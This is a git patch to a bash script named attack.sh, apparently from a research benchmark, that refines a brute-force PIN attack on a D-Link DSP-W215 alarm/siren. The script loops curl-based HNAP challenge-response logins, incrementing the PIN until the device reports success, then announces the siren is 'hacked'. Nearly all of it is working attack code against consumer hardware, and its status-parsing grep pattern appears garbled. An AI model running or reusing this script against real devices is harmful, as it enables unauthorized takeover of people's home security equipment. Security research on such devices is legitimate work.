From 51bed0fb5f840d76127d5c4dca0fd145b801dcce Mon Sep 17 00:00:00 2001 From: rtrimana Date: Thu, 21 Dec 2017 15:04:35 -0800 Subject: [PATCH] Perfecting brute-force attack for D-Link alarm/siren; basically we have to always do challenge-response (with pin) pair for every attempt until we see the value of LoginResult field changed from 'failed' to 'success' --- benchmarks/other/DLinkAlarm/attack.sh | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/benchmarks/other/DLinkAlarm/attack.sh b/benchmarks/other/DLinkAlarm/attack.sh index 39fb94e..609f95a 100755 --- a/benchmarks/other/DLinkAlarm/attack.sh +++ b/benchmarks/other/DLinkAlarm/attack.sh @@ -1,7 +1,8 @@ #!/bin/bash #modify next two line for your DSP-W215 -IP="192.168.0.35" -PIN=215530 +IP="192.168.0.4" +#PIN=0 +PIN=215500 #do not modify after this line if you don't know what you are doing function usage { @@ -29,6 +30,10 @@ end="" message="requestadmin$password" loginrequest="$head$message$end" +loop=true +while $loop + do + ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1` function getResult { @@ -36,15 +41,12 @@ function getResult { echo -n "$opt" } -PIN=0 - -while true - do -echo -e $PIN +echo -e "Current pin: $PIN" let PIN=$PIN+1 challenge=`getResult Challenge` cookie="Cookie: uid=`getResult Cookie`" publickey="`getResult PublicKey`$PIN" +echo -e "Public key: $publickey" privatekey=`hash_hmac "$challenge" "$publickey"` password=`hash_hmac "$challenge" "$privatekey"` timestamp=`date +%s` @@ -60,6 +62,13 @@ login="$head$message$end" mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1` echo -e "$mret" +status=`echo -n "$mret" | grep -Po "(?<=).*(?=)"` +echo -e "Status: $status\n\n" +if [ $status = "success" ] +then + echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n" + loop=false +fi done -- 2.34.1